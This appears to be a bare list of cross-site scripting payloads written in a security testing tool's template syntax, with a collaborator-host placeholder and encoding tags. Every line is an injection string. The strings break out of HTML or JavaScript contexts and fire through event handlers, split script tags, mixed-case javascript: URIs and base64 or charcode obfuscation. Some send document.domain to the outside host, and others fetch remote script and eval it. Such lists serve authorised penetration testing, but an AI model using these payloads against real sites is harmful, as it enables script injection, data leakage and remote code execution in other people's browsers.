";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
<sCRiPT>document.location='!-VARIABLE_COLLABORATOR-!/?domain='+document.domain</sCRiPT>
<scRiPT>eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))<scRiPT>
<scRiPT>document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain<scRiPT>
<scRipT>fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))</scRiPT>
"-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain-"
'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain-'
"onclick=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>"@x.y
"onclick=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain><svg/onload=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>"@x.y
<image/src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img/src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<image src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img src/onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<image src =q onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img src =q onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
</scrip</script>t><img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<svg onload=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
"><svg onload=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
"onmouseover=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
"autofocus/onfocus=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain-'
'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
\'-document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain//
"><img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
<img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain>
'><img src onerror=document.location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain
"-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))-"
'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))-'
"onclick=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>"@x.y
"onclick=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<svg/onload=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>"@x.y
<image/src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img/src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<image src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img src/onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<image src =q onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img src =q onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
</scrip</script>t><img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<svg onload=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
"><svg onload=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
"onmouseover=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
"autofocus/onfocus=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))-'
'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
\'-eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))//
"><img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
<img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))>
'><img src onerror=eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))
"-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))-"
'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))-'
"onclick=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>"@x.y
"onclick=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<svg/onload=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>"@x.y
<image/src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img/src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<image src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img src/onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<image src =q onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img src =q onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
</scrip</script>t><img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<svg onload=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
"><svg onload=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
"onmouseover=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
"autofocus/onfocus=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))-'
'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
\'-fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))//
"><img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
<img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))>
'><img src onerror=fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))
jAvAScRipT:location=String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain
jaVascRIPT:eval(atob(unescape('<@base64url>window.location="!-VARIABLE_COLLABORATOR-!/?domain="+document.domain<@/base64url>')))
JaVaSCript:fetch(String.fromCharCode(<@to_charcode>!-VARIABLE_COLLABORATOR-!<@/to_charcode>,47,63)+document.domain,{ mode: 'no-cors' }).then(r=>r.text().then(t=>eval(t)))
